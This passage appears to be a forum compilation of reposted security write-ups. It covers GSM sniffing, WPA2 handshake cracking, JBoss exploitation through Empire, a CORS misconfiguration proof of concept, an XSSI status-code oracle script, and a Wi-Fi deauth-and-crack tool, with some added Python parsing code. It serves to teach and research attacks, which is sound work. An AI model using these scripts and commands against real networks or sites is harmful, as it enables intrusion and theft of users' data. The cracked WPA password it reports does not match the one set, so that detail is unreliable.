In the above screenshot you can visually see the activity is around 945MHz. Once you know the GSM channel frequencies, you can start gr-gsm by running the python script ./airprobe_rtlsdr.py or load the airprobe_rtlsdr.grc file using gnuradio-companion and set one of the channel frequencies you just found in the frequency field. Don't forget to add the 'gain' value again, move back to the frequency field and start pressing the UP/DOWN arrows on your keyboard to scroll the frequencies in 200kHz steps until you start seeing some data in your console window. The whole process should look something like this:

Now you only need to launch wireshark from another terminal tab with the following command:

    sudo wireshark -k -Y 'gsmtap && !icmp' -i lo

If gr-gsm did its job, you should be able to see decoded GSM traffic sniffed by your hackrf.

WRITTEN BY Z4ZIGGY, MAY 17, 2015

Sursa: https://z4ziggy.wordpress.com/2015/05/17/sniffing-gsm-traffic-with-hackrf/
Nokia 6 is the first smartphone under this brand equipped with the Android operating system
Cătălin Niţu - 9 Jan 2017

HMD Global, the Finnish company that currently controls the Nokia brand, has finally announced the long-awaited Nokia 6 smartphone, the company's first device based on the Android operating system. It comes with hardware that is not exactly powerful for the return of such a big brand to the market, but it will have an affordable price. Most of those interested in the new Nokia phones with Android will probably be disappointed, however, by the fact that it will be launched exclusively for the Chinese market.

Nokia 6 is a smartphone that could be placed in the premium mid-range category, being equipped with mid-range hardware wrapped in quality materials such as glass and aluminium. We are talking about a device with a 5.5" display at Full HD resolution, a Snapdragon 430 chipset, 4 GB of RAM, 64 GB of storage and cameras of 16 and 8 megapixels, respectively. This hardware has already become standard even on mid-range devices, but the processor seems to be from a cheaper range, with limited performance. The pre-installed operating system will be the new Android Nougat, but how different the proprietary interface is from Google's standard one is not clear. The launch is scheduled for "early 2017", at a price of 1699 yuan, roughly 250 US dollars. The problem is that in China there are already many local brands offering much more powerful devices with similar construction at similar prices.

Via: http://www.go4it.ro/telefoane-mobile/nokia-6-este-primul-smartphone-sub-acest-brand-echipat-cu-sistem-de-operare-android-video-16053801/
Sunday, January 8, 2017

How to crack WLAN - WPA/WPA2 pre shared keys

Cracking WPA/WPA2 pre-shared keys may not be as difficult as many people think. When a client authenticates at the router, there is a 4-way handshake between router and client to negotiate a session key, which can be recorded with a simple WLAN sniffer. The messages are called EAPOL. Here I described how to set up a simple sniffer with a Raspberry Pi 2: http://blog.x1622.com/2016/12/how-to-setup-rasperry-pi-2-model-b-for.html

So, the only task to do is to record all the traffic until one of the 4-way handshakes gets recorded. In Wireshark there is a display filter called "eapol". In my test case, I opened a WLAN called darkqueen with a simple numeric password, 19042001. I authenticated with a mobile device and captured the handshake. In my example I did it more than once, but capturing a complete handshake (1-4) is enough. I stopped capturing and stored all data in the standard Wireshark pcap format. You can store all data or mark the EAPOL lines.

The standard PCAP file cannot be used directly with HASHCAT. The file has to be converted to hccap format. Here is a description of the different possibilities to do that: https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2 It can be done online, or locally using the AIRCRACK suite.

I took the hccap file to a single machine with an old GPU (~50 dollars) I got from my son's old gaming PC. I started HASHCAT for eight digits (the minimum length of WPA passwords is eight) and HASHCAT calculated a maximum time of 50 minutes. After a few minutes HASHCAT cracked the password of darkqueen => 1904001

In this POC it was simple because I used a weak WPA2 key. If it's more complex it may take much more time. In this case, there is also the possibility to pre-calculate a rainbow table if the name of the access point is known. For this COWPATTY can be used: http://tools.kali.org/wireless-attacks/cowpatty

Sursa: http://blog.x1622.com/2017/01/how-to-crack-wlan-wpawpa2-pre-shared.html
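Whether a capture is usable depends on which of the four EAPOL-Key messages the "eapol" filter actually caught, and Wireshark shows that only as flag bits. The Python below is an added example (not from the original post): it decodes the EAPOL-Key descriptor, maps the Key Information flags to message 1-4, and reports AP/client pairs with a complete handshake; the MAC addresses, nonces and frames are constructed test data and the MICs are zeroed.

```python
# Added example: classify EAPOL-Key frames into WPA/WPA2 4-way handshake
# messages 1-4 and find AP/client pairs with a complete handshake in a capture.
# All frames, MAC addresses and nonces are constructed test data (MIC zeroed).
import struct
from collections import defaultdict

# EAPOL-Key "Key Information" flag bits (IEEE 802.11 EAPOL-Key frame format)
KEY_TYPE_PAIRWISE = 1 << 3
KEY_INSTALL = 1 << 6
KEY_ACK = 1 << 7
KEY_MIC = 1 << 8
KEY_SECURE = 1 << 9
KEY_ENCRYPTED_DATA = 1 << 12
KEY_DESC_VERSION_AES = 2      # HMAC-SHA1-128 MIC, AES key wrap (CCMP networks)

EAPOL_TYPE_KEY = 3
DESCRIPTOR_RSN = 2            # WPA2 (RSN) key descriptor
DESCRIPTOR_WPA = 254          # legacy WPA key descriptor
KEY_HEADER_LEN = 95           # fixed part of the EAPOL-Key descriptor


def parse_eapol_key(frame):
    """Decode the classification-relevant fields of a raw EAPOL-Key frame.

    Descriptor layout: type(1) key_info(2) key_len(2) replay(8) nonce(32)
    iv(16) rsc(8) id(8) mic(16) key_data_len(2) key_data(...).
    """
    _version, eapol_type, length = struct.unpack_from("!BBH", frame, 0)
    if eapol_type != EAPOL_TYPE_KEY:
        raise ValueError("not an EAPOL-Key frame (type %d)" % eapol_type)
    body = frame[4:4 + length]
    if len(body) < KEY_HEADER_LEN:
        raise ValueError("truncated EAPOL-Key descriptor")
    desc_type, key_info, _key_len, replay = struct.unpack_from("!BHHQ", body, 0)
    if desc_type not in (DESCRIPTOR_RSN, DESCRIPTOR_WPA):
        raise ValueError("unknown key descriptor type %d" % desc_type)
    return {
        "key_info": key_info,
        "replay": replay,
        "nonce": body[13:45],
        "mic": body[77:93],
        "key_data_len": struct.unpack_from("!H", body, 93)[0],
    }


def handshake_message(fields):
    """Map Key Information flags to message number 1-4 (None if not 4-way)."""
    info = fields["key_info"]
    if not info & KEY_TYPE_PAIRWISE:
        return None                  # group-key handshake, not the 4-way
    ack, mic = bool(info & KEY_ACK), bool(info & KEY_MIC)
    if ack and not mic:
        return 1                     # AP -> STA: ANonce, no MIC yet
    if ack and mic and info & KEY_INSTALL:
        return 3                     # AP -> STA: install PTK, carries GTK
    if not ack and mic:
        # M2 carries the client's RSN IE in Key Data; M4 carries none.
        return 2 if fields["key_data_len"] > 0 else 4
    return None


def complete_handshakes(frames):
    """Return {(ap, sta): [1, 2, 3, 4]} for pairs where all four were seen.

    frames: iterable of (src_mac, dst_mac, eapol_bytes).
    """
    seen = defaultdict(set)
    for src, dst, raw in frames:
        msg = handshake_message(parse_eapol_key(raw))
        if msg is None:
            continue
        ap, sta = (src, dst) if msg in (1, 3) else (dst, src)  # 1,3: AP->STA
        seen[(ap, sta)].add(msg)
    return {pair: sorted(m) for pair, m in seen.items() if m == {1, 2, 3, 4}}


def build_eapol_key(key_info, replay, nonce, key_data=b""):
    """Construct a minimal RSN EAPOL-Key frame for testing (MIC left zeroed)."""
    body = struct.pack("!BHHQ", DESCRIPTOR_RSN, key_info, 16, replay)
    body += nonce + bytes(16) + bytes(8) + bytes(8) + bytes(16)  # iv rsc id mic
    body += struct.pack("!H", len(key_data)) + key_data
    return struct.pack("!BBH", 1, EAPOL_TYPE_KEY, len(body)) + body


# Constructed capture: one full handshake between a made-up AP and client.
AP, STA = "aa:bb:cc:dd:ee:01", "11:22:33:44:55:66"
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))
# RSN IE (CCMP ciphers, PSK AKM): the Key Data that M2 normally carries
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
PW = KEY_DESC_VERSION_AES | KEY_TYPE_PAIRWISE
SAMPLE_CAPTURE = [
    (AP, STA, build_eapol_key(PW | KEY_ACK, 1, ANONCE)),
    (STA, AP, build_eapol_key(PW | KEY_MIC, 1, SNONCE, RSN_IE)),
    (AP, STA, build_eapol_key(PW | KEY_ACK | KEY_MIC | KEY_INSTALL | KEY_SECURE
                              | KEY_ENCRYPTED_DATA, 2, ANONCE, bytes(56))),
    (STA, AP, build_eapol_key(PW | KEY_MIC | KEY_SECURE, 2, bytes(32))),
]
```

Feeding only the first two frames returns an empty result, which is the "handshake incomplete" case a capture tool should flag rather than convert.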
Exploiting JBoss with Empire and PowerShell

When Empire was initially launched by @harmj0y and @sixdub at BSidesLV, I was immediately excited about the possibilities that a pure PowerShell RAT would bring to the offensive community. With what little free time I have, I've been working to add a few modules that have been inspired by recent engagements I've been on. This post will cover how to enumerate and exploit an internal web service through a deployed Empire agent without port scanning.

In this demonstration, I have an Empire agent running on a Windows 7 host. The plan is to quietly enumerate the network for vulnerable web services and exploit one to move laterally. First, I load the recon/find_fruit module and set the required options. The find_fruit module accepts CIDR ranges as well as single hosts. The module is also multi-threaded with a default setting of ten threads. One thing that makes this module great for red teaming or quieter penetration testing is that, unlike port-scanning, it uses legitimate web requests to check for web services that we commonly target such as Apache Tomcat, JBoss, Cold Fusion and more. The module will also accept a custom dictionary if desired. Kicking off the module, I quickly find some "low hanging fruit" on a host in my target range.

Next, I want to create a payload and exploit the JMX-Console. Thanks to a stager by @ch33kyf3ll0w, Empire has the ability to generate Java .war files for deploying agents. If you're doing this outside of Empire, you can also generate a .war file using another @harmj0y script at https://gist.github.com/HarmJ0y/aecabdc30f4c4ef1fad3

Here I host the .war file with the Python SimpleHTTPServer module. This is necessary as the jmx-console exploit will reach out to grab this file and deploy it on the target server.

Finally, I load the exploitation/exploit_jboss module and set the required options. I start by setting the JMXConsole switch to "true". Next, the AppName needs to match the AppName I used when generating the .war file. I point the WarFile to my Python hosted file. Since I am tunnelling this exploit through an already deployed agent, I need to set the Agent option to deploy the exploit from. Empire will also let you know if this module is "opsec safe", meaning it drops a file to disk.

Once the exploit is launched, I first see the HTTP request from the target server to grab the hosted .war file. After a few seconds, I am greeted by a new Empire agent!

If you're looking for a way to enumerate and exploit internal web services without the noise of port-scanning, give this a try. The standalone Find-Fruit and Exploit-JBoss PowerShell scripts may be found on my GitHub repository as well.

Scripts: https://github.com/rvrsh3ll/Misc-Powershell-Scripts
Empire: http://www.powershellempire.com/

Sursa: http://www.rvrsh3ll.net/blog/offensive/exploiting-jboss-with-powershell-and-empire/
Exploiting Misconfigured CORS (Cross Origin Resource Sharing)
DECEMBER 16, 2016 ADMIN

Hey friends, a few days ago I noticed a blog post about exploiting Facebook chat and reading all the chats of users, so that made me interested in knowing about the issue, and basically it was a misconfigured CORS configuration where the null origin is allowed with credentials true. It was not something heard of for the first time; @albinowax from PortSwigger explained it very well in his blog post, so after reading that Messenger blog post I went to test for the same issue on some targets where I was allowed to test it. But before that, here are some tips about CORS, where it can be exploitable from an attacker's point of view:

POORLY IMPLEMENTED, BEST CASE FOR ATTACK:

    Access-Control-Allow-Origin: https://attacker.com
    Access-Control-Allow-Credentials: true

POORLY IMPLEMENTED, EXPLOITABLE:

    Access-Control-Allow-Origin: null
    Access-Control-Allow-Credentials: true

BAD IMPLEMENTATION BUT NOT EXPLOITABLE:

    Access-Control-Allow-Origin: *
    Access-Control-Allow-Credentials: true

or just

    Access-Control-Allow-Origin: *

Even this is not good from a development point of view, but due to CORS's own rules, if Access-Control-Allow-Origin is set to * we don't get the benefit of Access-Control-Allow-Credentials: true, meaning no cookie access of the victim. I am not going to go deeper into CORS, as the earlier blog post covered it very well. So above I mentioned 3 cases, where the first two cases are exploitable. The example of the 2nd case is that Facebook Messenger chat issue which I mentioned in the earlier section of the post, and the example of the 1st case is mine, which I found only 2 days ago, where any arbitrary Origin is allowed and the same Origin gets reflected back in Access-Control-Allow-Origin with Credentials set to true. The best way I found to check for CORS issues is using curl, e.g.:

    curl https://test.victim.com -H "Origin: https://geekboy.ninja" -I

and check the response to see whether the Origin is reflected in the response or not.

OR if you are a Burp Pro user, Burp Active Scan may find this for you, but in my case it didn't, I don't know the reason. When I curled my target manually

    curl https://my.target.com -H "Origin: https://geekboy.ninja" -I

the Origin didn't get reflected, but when I curled the specific endpoint where all the user's data was coming back in the response

    curl https://my.target.com/api/web/user -H "Origin: https://geekboy.ninja" -I

it reflected back my host with Credentials set to true, and that's enough to make this work and steal all that data. I made quick PoC code for it:

    function cors() {
      var xhttp = new XMLHttpRequest();
      xhttp.onreadystatechange = function() {
        if (this.readyState == 4 && this.status == 200) {
          // show the cross-origin response body that came back with the victim's cookies
          document.getElementById("demo").innerHTML = alert(this.responseText);
        }
      };
      xhttp.open("GET", "https://my.target.com/api/web/user", true);
      xhttp.withCredentials = true;   // send the victim's cookies with the request
      xhttp.send();
    }

And here is how it worked

Sources for better understanding of CORS:
http://blog.portswigger.net/2016/10/exploiting-cors-misconfigurations-for.html
https://developer.mozilla.org/en-US/docs/Web/HTTP/Access_control_CORS
https://ejj.io/misconfigured-cors/

Sursa: http://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/
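The three header patterns in the post, as an added example (not the author's code): a classifier for what a probe request with an untrusted Origin got back, the reflecting misconfiguration that produced the author's finding, and an exact-match allowlist that avoids all three cases. The hostnames and the allowlist entry are constructed.

```python
# Added example: classify CORS response headers into the post's three cases,
# next to the reflecting misconfiguration and an allowlist fix.
# Hostnames and the allowlist are constructed; nothing is from the original post.


def classify_cors(probe_origin, response_headers):
    """Classify the response to a request carrying an Origin the server has no
    reason to trust (the curl -H "Origin: ..." probe from the post)."""
    h = {k.lower(): v.strip() for k, v in response_headers.items()}
    acao = h.get("access-control-allow-origin")
    creds = h.get("access-control-allow-credentials", "").lower() == "true"
    if acao is None:
        return "no-cors"                       # browser blocks cross-origin read
    if acao == "*":
        # Browsers never attach cookies for '*', even with ACAC: true.
        return "wildcard-not-exploitable"
    if acao == "null" and creds:
        return "null-origin-with-credentials"  # sandboxed iframe / data: URL
    if acao == probe_origin and creds:
        return "reflected-with-credentials"    # attacker page reads victim data
    if acao == probe_origin:
        return "reflected-no-credentials"      # only unauthenticated data leaks
    return "other-origin"                      # ACAO names some other site


def reflecting_cors_headers(request_origin):
    """The misconfiguration in the post: echo whatever Origin arrives."""
    return {
        "Access-Control-Allow-Origin": request_origin,
        "Access-Control-Allow-Credentials": "true",
    }


ALLOWED_ORIGINS = frozenset({"https://app.my.target.com"})  # constructed


def allowlisted_cors_headers(request_origin, allowed=ALLOWED_ORIGINS):
    """Fixed version: exact-match allowlist, credentials only for known origins.

    Unknown and 'null' origins get no Access-Control-Allow-Origin header at all
    (not '*', not an echo). Vary: Origin stops caches from serving one origin's
    headers to another.
    """
    headers = {"Vary": "Origin"}
    if request_origin in allowed:
        headers["Access-Control-Allow-Origin"] = request_origin
        headers["Access-Control-Allow-Credentials"] = "true"
    return headers
```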
A New XSSI Vector (or the untold merits of nosniff)...
Posted on December 19, 2016 by Dennis Goodlett

Introduction

While playing with Cross Site Script Inclusion (XSSI) recently, I realized the attack can be used to leak information, cross-origin, from HTTP status codes. If you're thinking "XSSI Login Oracle" then you're on the right track, but the attack can be expanded to more situations. Login oracles are usually JavaScript files that load or don't load depending on current authentication status. However, this attack can be done on HTML, JSON, XML, or just about any content type. This dramatically opens up the attack surface of XSSI to enumerate information from GET parameters, one bit at a time. I haven't seen this specific attack published anywhere, so I'm going to attempt to make this post as comprehensive as possible.

Edit: domnul_anonim on Reddit pointed out that Mike Cardwell published the same basic attack before it was called "XSSI". My blog post presents some new ideas about the attack, but referring to it as "new" is a bit bold and isn't quite appropriate.

I've also structured this paper for easy reference. The structure is as follows:

Attack
Attack Requirements
Defense
Further study
Summary

TLDR Attack: Read "A More Interesting Example" in the Attack section below for a walkthrough.
TLDR Defense: Use the nosniff HTTP header ("Requirement 1" explained in Defense section below).

I won't explain the basics of XSSI because I lack the room. SCIP has a blog post explaining XSSI in great depth. I consider it the best reference and introduction on the subject. I'm presenting an attack on non-script content injection. Stronger attacks on non-script content are explained in the cited blog but the attacks tend to require more specialized circumstances (encoding and injection tricks) than the one I will be demonstrating.

1.) The Attack

The basic idea is very similar to a XSSI login oracle. An attacker attempts to load script tags on his page that point at a different origin. By handling the onerror, onload, and window.onerror functions, an attacker can learn information about how the cross-origin server responded to the GET request. I was surprised to learn that onerror executes if you receive a non-2XX response, and onload executes otherwise. This is regardless of the content type returned, unless strict content type is being enforced (see Requirement 1).

So what's the big deal? What can you learn from a 200 vs a 400 response? Well, it depends on the endpoint but potentially a lot. After all, the HTTP status code is meant to return information, and often does for APIs.

SOME BASIC EXAMPLES

Imagine an /admin directory that returns a 200 status code and HTML if you're authenticated, and a 401 with an HTML error page if you aren't. This would act not only as a login oracle, but it would also allow the enumeration of privileges.

If there was a unique profile page for each user (i.e. /profile/dennis) then a similar attack could be used by a malicious site to identify specific users for further attacks and play innocent to response teams.

If a page has SQL injection in a GET request but cannot be reached by the attacker, the attacker can cause authenticated users visiting an attacker controlled page to bit bang the injection for the attacker and leak the results cross origin to the attacker's JavaScript.

A MORE INTERESTING EXAMPLE

Let's walk through a more interesting example in greater detail. Imagine a ticketing system that has a search field which is used to look up customer information. Sending a GET to "/search?c=d*", where the "*" character is acting as a wildcard, will return all the customers that start with the letter "d" and a 200 status code. If no customers match the "d*" pattern, then a 500 is returned. An attacker wants this information, but can't login and just look. So instead he asks an already logged in user to make requests on the attacker's behalf and tell the onload function "yes, I found someone" or tell the onerror function "no, that search returned nothing". It's similar to exploiting a blind SQL injection except it's through a third party and you're abusing Same-Origin Policy instead of syntax.

Notice, the content type returned in the body by the ticketing system does not need to be assumed here. The search can return JSON, XML, HTML or even an image, it's all the same to this attack as long as the nosniff header isn't being returned (Requirement 1 in defense).

URL parameters can be included in the script src attribute so an attacker can create a script like so:

    d = document.createElement('script');
    d.src = victim_domain + "/search?c=a*";

This will send a GET request to the "/search?c=a*" API on the ticketing system. Now the attacker just sets the onload and onerror events to log success and failure respectively:

    d.onload = function(){client_exists("a*")};
    d.onerror = function(){client_does_not_exist("a*")};

Then append it to the DOM:

    document.head.appendChild(d);

Any visitor to the attacker's site will then automatically send a GET request to the ticketing system, cross-origin. If there's a customer that starts with "a", then the endpoint will return a 200 and the onload will execute. The attacker's onload handler would then load another script into the DOM asking if there are any customers that start with "aa". If the onerror event occurs it's because there were no customers that started with the letter "a", so the attacker would then load another script into the DOM checking for customers who start with the letter "b". The script would continue with a tree searching algorithm until a valid customer name was returned. Once a customer name is discovered, the same type of attack can be used to search other API endpoints that require a customer name and return other information. For example, an endpoint that searches for email addresses associated to a customer.

The attacker could also search for customers matching the "*" pattern. If this fails it means the visitor doesn't have access to the ticketing system customer search and no further requests need to be made. Because the information stealing requests are being performed by visitors to the attacker's site, the attack can be parallelized across all visitors. Put all this together with a social engineering email and there is potential for a lot of information leakage from even an internal ticketing system.

This attack is not far fetched and does not require special circumstances. HTTP status codes are meant to return information. Script tags are meant to detect the onerror and onload.

2.) Attack Requirements

To put it simply, the following elements are required:

1. The 'X-Content-Type-Options: nosniff' HTTP header is not being returned, unless the content type is JavaScript.
2. The endpoint must respond to a GET request.
3. The status code of the endpoint varies from a 200 type response to a non-200 type response for success/failure (Note: 300 responses seem to act like whatever status code they point to).
4. The information is not publicly available.

The most concerning thing is what is not said here. There is no mention of content type, other than JavaScript in requirement 1. So, this attack works on XML, JSON, images, or any other content (so far as I have seen). (See Note 2 in "Requirement 1" below for details). More details on the requirements follow in the defense section. Pentesters: you should read that section too, because it explains some more tricks in greater depth.

3.) The Defense

You just have to disturb one of the above requirements. Let's go through the requirements in greater detail from a defensive perspective.

REQUIREMENT 1

If the 'X-Content-Type-Options: nosniff' HTTP header is returned, this attack won't work. This is the simplest to verify and to implement. If you want to fix your site this is probably the way to do it. The nosniff header is a way the server can tell a browser "When I say I am giving you <Content-Type> I mean it is really <Content-Type>!".

Why does this work? All types of files are served over HTTP, and web developers aren't always good about declaring the file type properly. So when a browser requests a JavaScript file, the content-type header may declare it's actually HTML. A browser thus puts off producing an error until it tries to parse the file as JavaScript. At that point, onload has already executed and any parsing errors will call the window.onerror function. The existence of the nosniff header means onerror will always be called immediately if the content type isn't stated correctly. Always onerror means no measurable difference and no information loss. If the content type is JavaScript, nosniff doesn't help and you have a normal XSSI attack.

Note: This is only true for browsers that respect the nosniff header. IE and Chrome were the first to support this header. Firefox has followed also; I don't know when support started but I have found Firefox 51 honors nosniff while Firefox 45.5 does not. I assume Edge will act the same as IE, but I haven't personally tested either of them.

Edit: 1lastBr3ath from Reddit pointed out Safari doesn't support the no-sniff header, Edge does. Also he corrected my mistake, it is Firefox 51 not 50 that included support for no-sniff.

Note 2: On the topic of what content type, 1lastBr3ath from Reddit pointed me to this documentation, which is really where I should've pointed to. It states: "The script should be served with the text/javascript MIME type, but browsers are lenient and only block them if the script is served with an image type (image/*), a video type (video/*), an audio (audio/*) type, or text/csv. If the script is blocked, an error is sent to the element, if not a success event is sent." So all content types won't work in script tags. However, typical informational content types, like XML or JSON, will. This restriction can potentially be bypassed by just using a different tag (See Further Study: other tags).

REQUIREMENT 2

Script tags only work with GET requests. So if your endpoint only accepts POST requests, then this attack can't be performed. This requirement is seemingly simple, but be careful. You may have designed your API to accept POST requests but your content management system may accept GET requests all the same.

REQUIREMENT 3

If the endpoint always returns a 200, then there is no information within the status code to steal. However, status codes exist for a reason! Don't just go abandoning a core part of the HTTP protocol just to stop this attack. Use the nosniff header instead. Constant HTTP status codes do stop the particular attack described here, but other attacks may still be possible. For example, a top level JSON array can be parsed as JavaScript while a top level JSON object can not. So even though your endpoint always returns 200 status codes, information can be gathered from whether or not there is a parsing error by creating a window.onerror function. Applying the nosniff header will stop even this attack as long as the Content-Type header is appropriately set to JSON.

REQUIREMENT 4

If an attacker is in a position to just load up the secret information in his own browser, then there is no need for this attack. This attack revolves around an attacker domain asking a visitor to use their privileged position to get more information. Privileged position will most commonly mean authenticated, but could also mean network position. If your home router has this vulnerability, malicious public sites can request scripts from it and leak information.

4.) Further Study

3XX CODES: I have given little attention to open redirects and 3XX responses, which could expand the attack further. So far it does appear redirecting to a 2XX acts like a 2XX and redirecting to a non-2XX acts like a non-2XX. This means an endpoint protecting itself by checking the referer header might be bypassed if an open redirect is discovered. This is a neat idea too.

OTHER TAGS: I believe img tags pointing cross-origin behave similar to script tags. Maybe loading a resource in both img and script tags could lead to more information disclosure due to parsing differences. CSS may also deserve a look.

OTHER ATTRIBUTES: I was hoping Subresource Integrity would yield further information leaks, but it wisely requires CORS to work. If you can get around CORS then there are bigger problems than this attack. I have spent most of my time testing onload, onerror, and window.onerror to get information. Observing more attributes may yield other attacks or more information per request.

5.) In Summary

Any detectable difference in loading a cross origin resource is information. That information may be as minor as a login oracle, but could potentially be as bad as credentials (though unlikely).

Defenders: A misunderstanding of content type is a common vector for all sorts of attacks. Enforcing strict content type with the nosniff HTTP header will mitigate this and many more attacks. It also puts you in a failsafe position. A response with improper content will cause an error that will be obvious to anyone and fixed easily.

Attackers: Same origin policy is a little understood concept, which makes it a great source of bugs. Look for sensitive information returned in GET requests. Then see if you can detect any difference in behavior when requesting that information cross origin via script tags.

This entry was posted in Penetration Testing by Dennis Goodlett

Sursa: https://www.hurricanelabs.com/blog/new-xssi-vector-untold-merits-of-nosniff
Mobile Security Framework (MobSF)
Version: v0.9.3 beta

Mobile Security Framework (MobSF) is an intelligent, all-in-one open source mobile application (Android/iOS/Windows) automated pen-testing framework capable of performing static and dynamic analysis. It can be used for effective and fast security analysis of Android, iOS and Windows mobile applications and supports both binaries (APK, IPA & APPX) and zipped source code. MobSF can also perform Web API security testing with its API Fuzzer that can do information gathering, analyze security headers, identify mobile API specific vulnerabilities like XXE, SSRF, Path Traversal, IDOR, and other logical issues related to session and API rate limiting.

Made with ♥ in India

MobSF is also bundled with Android Tamer and BlackArch

Documentation
https://github.com/ajinabraham/Mobile-Security-Framework-MobSF/wiki/1.-Documentation

Collaborators
Ajin Abraham
Dominik Schlecht

Presentations
OWASP APPSEC EU 2016 - Slides | Video
NULLCON 2016 - Slides
c0c0n 2015 - Slides

More info: https://github.com/ajinabraham/Mobile-Security-Framework-MobSF
Google patches severe Android boot mode vulnerability

The critical vulnerability left Android devices open to denial of service and privilege escalation attacks.

By Charlie Osborne for Zero Day | January 9, 2017

Google has resolved a dangerous Android vulnerability which allowed attackers to reboot Nexus devices into custom boot modes, leading to spying and remote attacks.

Patched as part of Google's January Android security bulletin, the flaw, CVE-2016-8467, grants cyberattackers the ability to use PC malware or malicious chargers to reboot a Nexus 6 or 6P device and implement a special boot configuration, or boot mode, which instructs Android to turn on various extra USB interfaces.

According to IBM X-Force Application Security Research Team researchers Roee Hay and Michael Goberman, who revealed further details of the vulnerability in a blog post, the flaw gives attackers access to interfaces which offer additional control over a compromised device.

In particular, on the Nexus 6 the modem diagnostics interface is of concern, as accessing this platform gives attackers access to the modem, which compromises "confidentiality and integrity," the team says.

Once an attacker has gained access to the modem they can intercept phone calls, for example. It would also be possible to sniff mobile data packets and grab information including GPS coordinates of the device for tracking, place phone calls, steal call information and either access or change nonvolatile (NV) items or the EFS partition of a device.

See also: Google patches Dirty Cow vulnerability in latest Android security update

IBM says that if Android Debug Bridge (ADB) is enabled on the device, PC malware or a malicious charger can boot the target device with the special boot mode configuration. Once connected, the user is forced to accept the PC or charger permanently, a few commands are issued, and the device is rebooted.

"Every future boot from this point forward will have the boot mode configuration enabled," IBM says. "This means the attack is persistent and no longer requires ADB to run, although it still requires USB access."

"Therefore, the attacker only needs the victim to enable ADB once," the researchers added. "Moreover, a lucky attacker might wait for the device to be in fastboot mode, which requires no authorization from the victim. This, however, is less likely."

If attackers have physical access to the device, they can also reboot it into the custom boot mode manually.

These issues are less severe on the Nexus 6P due to firmware protections; however, a quirk in the device type means attackers can open ADB sessions even if the mode has been disabled.

In addition, due to the inclusion of additional USB interfaces in both device types, attackers can also access other interfaces to send or eavesdrop on SMS messages and potentially bypass two-factor authentication, escalate privileges, change radio settings and access a wide range of mobile device features.

Google has now patched the flaw by forbidding a locked bootloader to boot with the dangerous boot modes.

In December, researchers revealed that a new variant of Android malware called Gooligan was exploiting unpatched vulnerabilities to steal sensitive user data.

Sursa: http://www.zdnet.com/article/google-patches-severe-android-boot-mode-vulnerability/
-
DriveCrypt

DriveCrypt Dcr.sys vulnerability exploit for bypassing x64 DSE

Link: https://github.com/subTee/DriveCrypt
-
HandShaker

Detect, deauth, capture, crack WPA/2 handshakes and WEP keys. Crack WPS pins. Record AP location with Android GPS. Maintain a db of pwnd APs to avoid repetition.

Installation:

Run 'make install' in the HandShaker directory. handshaker will now be installed and can be run with 'handshaker'.

Usage

    HandShaker - Detect, deauth, capture, crack WPA/2 handshakes and WEP Keys automagically.
    by d4rkcat <thed4rkcat@yandex.com>

    Usage: handshaker <Method> <Options>

    Method:
        -a   - Autobot or wardriving mode
        -e   - Search for AP by partial unique ESSID
        -l   - Scan for APs and present a target list
        -c   - Crack handshake from pcap
        -r   - WPS Cracking with reaver

    Options:
        -i   - Wireless Interface card
        -i2  - Second wireless card (better capture rate)
        -w   - Wordlist to use for cracking
        -o   - Save handshakes to custom directory
        -d   - Deauth packets sent to each client (default 1)
        -p   - Only attack clients above this power level
        -g   - Use android GPS to record AP location
        -B   - Use besside-ng to capture handshakes
        -E   - Use evil twin AP to capture handshakes
        -M   - Use mdk3 for deauth (default aireplay-ng)
        -T   - Attempts to capture per AP (default 3)
        -W   - Only attack WEP encrypted APs
        -s   - Silent
        -h   - This help

    Examples:
        handshaker -a -i wlan0 -T 5                  ~ Autobot mode on wlan0 and attempt 5 times.
        handshaker -e Hub3-F -w wordlist.txt         ~ Find AP like 'Hub3-F' and crack with wordlist.
        handshaker -l -o out/dir                     ~ List all APs and save handshakes to out/dir.
        handshaker -c handshake.cap -w wordlist.txt  ~ Crack handshake.cap with wordlist.

    all your AP are belong to us..

Source: https://github.com/d4rkcat/HandShaker
-
Racing for everyone: descriptor describes TOCTOU in Apple's core

by Qidan He (@flanker_hqd)

This blog post is about a new type of vulnerability in IOKit I discovered and submitted to Apple in 2016. I did a brief scan using an IDA script on MacOS and found at least four bugs with 3 CVEs assigned (CVE-2016-7620/4/5), see https://support.apple.com/kb/HT207423. I was told afterwards that there're even more issues of this type in iOS'/OSX's IOKit drivers and fortunately Apple fixed them also.

Lecture time: IOKit revisited

Recall the old userspace iokit call entry method:

    kern_return_t
    IOConnectCallMethod(
            mach_port_t      connection,        // In
            uint32_t         selector,          // In
            const uint64_t  *input,             // In
            uint32_t         inputCnt,          // In
            const void      *inputStruct,       // In
            size_t           inputStructCnt,    // In
            uint64_t        *output,            // Out
            uint32_t        *outputCnt,         // In/Out
            void            *outputStruct,      // Out
            size_t          *outputStructCntP)  // In/Out
    {
        //...
        if (inputStructCnt <= sizeof(io_struct_inband_t)) {
            inb_input = (void *) inputStruct;
            inb_input_size = (mach_msg_type_number_t) inputStructCnt;
        }
        else {
            ool_input = reinterpret_cast_mach_vm_address_t(inputStruct);
            ool_input_size = inputStructCnt;
        }
        //...
        else if (size <= sizeof(io_struct_inband_t)) {
            inb_output = outputStruct;
            inb_output_size = (mach_msg_type_number_t) size;
        }
        else {
            ool_output = reinterpret_cast_mach_vm_address_t(outputStruct);
            ool_output_size = (mach_vm_size_t) size;
        }
        }

        rtn = io_connect_method(connection, selector,
                        (uint64_t *) input, inputCnt,
                        inb_input, inb_input_size,
                        ool_input, ool_input_size,
                        inb_output, &inb_output_size,
                        output, outputCnt,
                        ool_output, &ool_output_size);
        //...
        return rtn;
    }

If the inputStruct is larger than sizeof(io_struct_inband_t), the passed-in argument will be cast to a mach_vm_address_t, otherwise it stays a native pointer.
Is this one race-able? No? Is that one race-able?

For a curious mind one would like to ask: does any possibility exist that this can be modified to lead to a TOCTOU? Historical vulnerabilities focused on racing memory shared via IOConnectMapMemory, whose meaning is very obvious from the name (see Pangu's and Ian Beer's research); however, these kinds of vulns are mostly eliminated now. Eyes turned to these simple and naive IOKit arguments: are these benign little spirits even race-able? Let's see how these arguments are passed from userspace to kernel space. In MIG trap defs and generated code, different input types are dealt with in different ways.

    routine io_connect_method(
                connection      : io_connect_t;
            in  selector        : uint32_t;

            in  scalar_input    : io_scalar_inband64_t;
            in  inband_input    : io_struct_inband_t;
